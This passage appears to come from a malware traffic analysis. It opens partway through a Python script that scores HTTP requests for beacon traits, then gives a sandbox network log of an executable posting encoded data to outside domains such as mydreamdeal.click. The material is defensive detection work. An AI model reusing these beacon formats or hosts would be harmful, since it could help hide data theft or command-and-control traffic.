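Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Host: www.zxyck.net
Origin: http://www.zxyck.net
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 10301
Connection: close
Referer: http://www.zxyck.net/gxyh/
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko

xP7x=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3hljwmwlhrGGeXhUnf5JTtNIeZImS21DK39UpboneOXy5wMHcqE6DsByg74kx54Axlasamaiw"""

GET_BEACON = """GET /gxyh/?xP7x=xivIugper8hSVuoO04uKuRFsECiR4QMGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT+8RMEQc9vH5Jgj7hQnpQkzk/1bmr1+yLEUs8=&F4=Q0yHy HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.zxyck.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
"""

# Constructed benign control: an ordinary browser login form submission.
BENIGN_POST = """POST /login HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0

user=alice&password=hunter2"""


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = {}
    for pair in (url.query.split("&") if url.query else []):
        key, _, value = pair.partition("=")   # keep '+', '/' and '=' padding verbatim
        query[key] = value
    return {"method": method, "path": url.path, "query": query,
            "headers": headers, "body": body}


def indicators(req: dict) -> list:
    """Beacon traits present in one request; each one is observed in the sessions above."""
    h, hits = req["headers"], []
    host, path = h.get("host", ""), req["path"]
    if SHORT_PATH.match(path):
        hits.append("short single-segment path")
    if req["method"] == "POST":
        _key, sep, value = req["body"].partition("=")
        if (h.get("content-type") == "application/x-www-form-urlencoded"
                and sep and "&" not in req["body"] and B64ISH.match(value)):
            hits.append("single base64-like form field")
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
            hits.append("Origin/Referer point back at the beacon path")
        if h.get("cache-control") == "no-cache":
            hits.append("Cache-Control: no-cache on a form POST")
    elif req["method"] == "GET":
        values = list(req["query"].values())
        if (len(values) == 2
                and any(len(v) > 60 and B64ISH.match(v) for v in values)
                and any(len(v) <= 8 for v in values)):
            hits.append("two-parameter query: base64-like blob plus short token")
        if "accept-encoding" not in h:
            hits.append("GET without Accept-Encoding")
    if any(tok in h.get("user-agent", "") for tok in UA_PHONE_TOKENS):
        hits.append("Windows Phone User-Agent from a desktop process")
    if h.get("connection", "").lower() == "close":
        hits.append("Connection: close")
    return hits


def is_beacon(req: dict) -> bool:
    return len(indicators(req)) >= THRESHOLD


def shared_field_names(reqs: list) -> set:
    """Field names used both as the sole POST form field and as a GET query key
    against the same host (the POST/GET pair in the report share 'xP7x')."""
    post_keys = {(r["headers"].get("host"), r["body"].partition("=")[0])
                 for r in reqs if r["method"] == "POST"}
    get_keys = {(r["headers"].get("host"), k)
                for r in reqs if r["method"] == "GET" for k in r["query"]}
    return {key for _host, key in post_keys & get_keys}


if __name__ == "__main__":
    reqs = [parse_request(r) for r in (POST_BEACON, GET_BEACON, BENIGN_POST)]
    for r in reqs:
        print(r["method"], r["path"], is_beacon(r), indicators(r))
    print("shared field names:", shared_field_names(reqs))
```

The per-request traits are individually weak (Connection: close and a phone User-Agent occur in benign traffic too), which is why the score sums them and why the correlation function, which keys on the same field name appearing as the sole POST field and as a GET query key against one host, is the stronger signal; a production rule would additionally group by process and by the repeated body lengths seen across hosts.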


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      34 | 192.168.2.4 | 50036 | 188.114.96.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:59.051595926 CET | 790 | OUT | POST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 36 62 55 59 48 70 57 2b 6f 46 73 76 31 51 47 41 56 77 69 46 31 56 67 37 62 6e 53 48 54 6e 6d 78 57 51 46 4f 2b 78 4e 73 70 74 55 34 37 61 4c 6a 42 69 58 44 44 49 38 71 69 4c 38 4b 2b 4c 34 65 41 2f 2b 52 50 72 38 48 2b 37 4e 77 51 78 55 2b 77 4b 67 4b 44 76 6f 6f 64 46 75 68 62 74 7a 34 30 79 67 49 67 76 63 6e 55 48 51 4b 32 65 43 56 6c 2f 6d 32 53 64 44 37 5a 70 77 6e 30 67 38 2b 76 63 33 36 41 43 49 31 49 67 65 69 30 6c 69 6a 61 36 4c 72 2f 4b 39 4f 4b 6a 51 73 45 68 48 39 69 48 42 78 57 67 38 33 4b 70 58 76 6f 3d
                                                                      Data Ascii: xP7x=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/6bUYHpW+oFsv1QGAVwiF1Vg7bnSHTnmxWQFO+xNsptU47aLjBiXDDI8qiL8K+L4eA/+RPr8H+7NwQxU+wKgKDvoodFuhbtz40ygIgvcnUHQK2eCVl/m2SdD7Zpwn0g8+vc36ACI1Igei0lija6Lr/K9OKjQsEhH9iHBxWg83KpXvo=
                                                                      Jan 8, 2025 16:14:59.748958111 CET | 1068 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:59 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:14:59 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jybOHATB0uEZm7pKu9%2BpEeRIOLFF38PJIBsVJ9Fi6yR6TUpRujWfH8p50rEUmE3FW9B2C8DNpYL8w%2B8ja7%2BeRduRXe1fFIAoEfS5nbFSk9nzy9LoTgXx0t5TJ%2BoV%2Fv6jZE2OnJl0L2M%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed23f17f848cdc-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2030&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      35 | 192.168.2.4 | 50037 | 188.114.96.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:15:01.604249954 CET | 10872 | OUT | POST /1ag2/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Origin: http://www.mydreamdeal.click
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.mydreamdeal.click/1ag2/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 79 62 55 76 76 70 58 66 6f 46 74 76 31 51 61 51 56 78 69 46 31 79 67 37 6a 6a 53 48 66 52 6d 33 4b 51 45 73 6d 78 4c 64 70 74 65 34 37 61 45 44 42 6a 49 54 44 5a 38 71 79 50 38 4b 4f 4c 34 65 41 2f 2b 54 48 72 31 32 2b 37 42 51 51 79 64 65 77 47 32 36 43 49 6f 6f 30 77 75 68 66 69 7a 6f 55 79 75 49 51 76 65 79 49 48 63 4b 32 59 46 56 6b 34 6d 32 65 53 44 37 31 66 77 6d 78 33 38 35 76 63 30 65 78 4b 4e 56 4d 59 41 45 34 4c 2b 41 43 53 51 4c 79 4e 6c 64 47 67 57 38 59 5a 61 4d 36 65 4f 51 44 38 67 30 47 72 55 2f 73 61 74 58 54 76 61 78 4c 37 7a 51 79 57 6c 79 77 58 77 37 34 79 57 71 44 32 53 43 4e 75 52 48 4b 7a 2f 70 64 76 64 78 45 36 34 6c 6d 6a 5a 6b 53 67 35 32 55 68 58 7a 4e 57 6b 67 65 44 6c 55 48 54 4b 78 67 62 36 51 55 48 34 65 43 45 6b 30 51 61 5a 4e 61 67 46 41 76 35 44 4b 57 66 52 4a 76 58 56 64 56 2b 70 54 69 67 74 31 44 64 66 75 44 46 5a 55 33 62 4e [TRUNCATED]
                                                                      Data Ascii: xP7x= [TRUNCATED]
                                                                      Jan 8, 2025 16:15:02.352977037 CET | 1052 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:15:02 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:15:02 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bmHic3xQQQFH9%2FrgA7V0HODBCP%2FrwI4z6Q1F7qfKJpUFXk1wZlB09t0tOr4yfgw7nFGQ5P%2F84Xo%2BJtUf3i1muBzfE8OEC6TpBNxjuwtvDLiAfxVlpEzDOX05SpGJJWTxH5R6ImEk3I%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed24018f274205-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10872&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a
                                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.
                                                                      Jan 8, 2025 16:15:02.354298115 CET | 21 | IN | Data Raw: 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: bh0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      36 | 192.168.2.4 | 50038 | 188.114.96.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:15:04.154334068 CET | 493 | OUT | GET /1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.mydreamdeal.click
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:15:04.892368078 CET | 1068 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:15:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                      Expires: Wed, 08 Jan 2025 15:15:04 GMT
                                                                      Vary: Accept-Encoding
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5Uvh9s%2FcUrTyweVGtBN4pIsqy9abNbyWxw8Yjtg0Q1VkgvK7JKYoDTFzyCtjozq7u9VC0nN3Zy46SrBZmlrdzTa3%2FedcNK9dt4Taf%2F%2FxcDqOnH5ky73Gp5a%2Fr9e2M6NaqgveTwL6tk%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed2411787f7cee-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      37 | 192.168.2.4 | 50039 | 194.245.148.189 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:15:09.992022991 CET | 773 | OUT | POST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 43 4a 63 67 76 59 4c 67 53 6e 35 33 65 64 43 71 36 64 63 46 5a 30 61 57 7a 32 7a 73 71 46 42 2b 67 45 4b 43 70 6f 76 6e 33 31 4d 5a 69 79 34 74 6f 55 73 58 50 6b 62 54 2b 4c 35 57 59 68 67 35 45 6e 54 5a 44 34 32 5a 49 57 36 79 39 72 67 6e 46 62 53 68 6d 52 65 2f 59 6e 2b 61 52 66 4e 44 52 46 73 5a 77 46 30 68 64 56 48 52 61 33 4b 71 68 6c 31 69 74 4f 4a 76 64 68 71 56 58 6d 57 74 39 56 4c 33 2b 69 55 4e 31 32 42 2b 45 70 6d 57 4a 4d 4f 33 78 78 73 4b 2f 5a 71 4b 4b 4f 64 6d 6f 75 72 2b 36 4a 35 2b 64 6f 4f 6e 67 34 42 2b 64 63 76 56 62 77 3d 3d
                                                                      Data Ascii: xP7x=lHgkb+a8mCncCJcgvYLgSn53edCq6dcFZ0aWz2zsqFB+gEKCpovn31MZiy4toUsXPkbT+L5WYhg5EnTZD42ZIW6y9rgnFbShmRe/Yn+aRfNDRFsZwF0hdVHRa3Kqhl1itOJvdhqVXmWt9VL3+iUN12B+EpmWJMO3xxsK/ZqKKOdmour+6J5+doOng4B+dcvVbw==
                                                                      Jan 8, 2025 16:15:10.616898060 CET | 322 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:10 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      38 | 192.168.2.4 | 50040 | 194.245.148.189 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:15:12.533767939 CET | 793 | OUT | POST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 78 2b 68 6c 36 43 6d 4a 76 6e 30 31 4d 5a 70 53 34 30 31 45 74 36 50 6b 6d 67 2b 4f 35 57 59 68 30 35 45 6d 6a 5a 44 76 69 61 4a 47 36 30 32 4c 67 66 4c 37 53 68 6d 52 65 2f 59 6b 43 38 52 66 31 44 51 32 6b 5a 77 6e 4d 67 58 31 48 65 4d 6e 4b 71 79 31 31 6d 74 4f 49 36 64 67 47 2f 58 6b 75 74 39 56 62 33 2b 77 73 53 6d 57 42 38 41 70 6e 76 4b 65 75 6e 30 45 45 46 33 34 75 65 4e 73 49 4c 67 49 6d 6b 72 34 59 70 50 6f 71 55 39 2f 49 4b 51 66 53 63 41 30 77 2b 6a 6a 5a 6c 63 36 72 63 5a 5a 38 6b 52 51 57 69 47 44 49 3d
                                                                      Data Ascii: xP7x=lHgkb+a8mCncDosgp/fgFX5obdCq19cBZ0mWz338qwx+hl6CmJvn01MZpS401Et6Pkmg+O5WYh05EmjZDviaJG602LgfL7ShmRe/YkC8Rf1DQ2kZwnMgX1HeMnKqy11mtOI6dgG/Xkut9Vb3+wsSmWB8ApnvKeun0EEF34ueNsILgImkr4YpPoqU9/IKQfScA0w+jjZlc6rcZZ8kRQWiGDI=
                                                                      Jan 8, 2025 16:15:13.142661095 CET | 322 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:13 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      39 | 192.168.2.4 | 50041 | 194.245.148.189 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:15:15.084863901 CET | 10875 | OUT | POST /dvmh/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.maitreyatoys.world
                                                                      Origin: http://www.maitreyatoys.world
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.maitreyatoys.world/dvmh/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 35 2b 67 54 6d 43 6e 71 48 6e 31 31 4d 5a 79 79 34 70 31 45 74 43 50 6b 2b 73 2b 4f 39 47 59 6a 4d 35 45 45 72 5a 55 4f 69 61 51 32 36 30 35 72 67 6b 46 62 53 30 6d 51 75 7a 59 6b 53 38 52 66 31 44 51 32 49 5a 32 31 30 67 52 31 48 52 61 33 4b 75 68 6c 31 4f 74 4e 34 71 64 67 7a 49 58 58 6d 74 39 30 72 33 79 6a 55 53 38 57 42 79 48 70 6e 65 4b 65 6a 67 30 41 64 30 33 34 61 30 4e 75 55 4c 6a 63 6a 61 76 62 6f 6a 64 34 75 36 2b 59 67 51 52 59 71 68 4c 6b 30 72 73 69 5a 64 45 4c 37 79 66 2b 49 76 4d 56 47 6c 62 31 35 57 33 69 62 4a 67 57 71 71 79 31 5a 42 79 45 37 4b 49 4e 48 54 6a 68 6a 64 54 33 31 33 31 41 4e 6b 49 2b 69 7a 61 31 51 77 39 7a 6c 2b 6c 73 52 53 61 6b 55 4d 75 37 7a 58 67 62 6f 6a 36 33 6c 51 57 36 2b 44 53 75 6f 74 74 37 66 56 6f 6d 6f 38 4f 52 50 56 57 7a 44 2b 49 33 74 43 56 50 59 4a 49 54 65 47 68 6d 30 4d 51 50 47 58 6e 50 72 53 7a 48 68 2f 4a [TRUNCATED]
                                                                      Data Ascii: xP7x= [TRUNCATED]
                                                                      Jan 8, 2025 16:15:15.774914026 CET | 322 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: nginx
                                                                      Date: Wed, 08 Jan 2025 15:15:15 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
